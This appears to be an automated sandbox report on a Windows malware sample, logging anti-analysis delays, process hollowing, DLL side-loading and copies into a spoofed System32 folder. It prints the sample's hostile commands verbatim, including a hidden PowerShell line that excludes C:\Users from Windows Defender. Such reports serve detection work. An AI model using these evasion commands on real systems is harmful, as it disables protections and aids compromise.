Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\flhgywjG.bat TID: 6828	Thread sleep count: 312 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\flhgywjG.bat TID: 6828	Thread sleep time: -156000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Libraries\flhgywjG.bat	Last function: Thread delayed
Source: C:\Users\Public\Libraries\flhgywjG.bat	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9434			Jump to behavior
Source: C:\Users\Public\Libraries\flhgywjG.bat	Window / User API: foregroundWindowGot 377			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

API call chain: ExitProcess graph end node

graph_0-22211

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.0000000000706000.00000004.00000020.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.553677436.000000000067A000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000003.555823587.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053964949.0000000000741000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000003.555823587.0000000000740000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000003.555974241.0000000000740000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571116857.0000000000738000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571116857.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.0000000000854000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: tTIYCp2sf4.exe, 00000000.00000002.553677436.00000000006EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe.com
Source: Gjwyghlf.PIF, 00000013.00000002.571116857.0000000000738000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_028558CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_028558CC

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_02867B24 LoadLibraryA,GetProcAddress,WriteProcessMemory,FreeLibrary,

0_2_02867B24

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows \System32\easinvoker.exe

Code function: 11_2_613C1B60 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

11_2_613C1B60

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 protect: page read and write	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 490000 protect: page read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 protect: page read and write
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 490000 protect: page read and write
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 protect: page read and write
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory allocated: C:\Users\Public\Libraries\flhgywjG.bat base: 490000 protect: page read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 value starts with: 4D5A
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000 value starts with: 4D5A

DLL side loading technique detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\System32\netutils.dll

Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Section unmapped: C:\Users\Public\Libraries\flhgywjG.bat base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section unmapped: C:\Users\Public\Libraries\flhgywjG.bat base address: 400000
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Section unmapped: C:\Users\Public\Libraries\flhgywjG.bat base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 31C008	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D69760	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D698F0	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D6AEF0	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 39A008
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D69760
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D698F0
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D6AEF0
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 232008
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D69760
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D698F0
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Memory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D6AEF0

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat

Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerd
Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerO
Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerJ
Source: flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager@(
Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerV
Source: flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager76\0
Source: flhgywjG.bat, 00000011.00000002.1053880782.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager~
Source: flhgywjG.bat, 00000011.00000002.1053964949.0000000000741000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.17.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02855A90
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02855B9C
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: GetLocaleInfoA,	0_2_0285A7A8
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: GetLocaleInfoA,	0_2_0285A7F4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
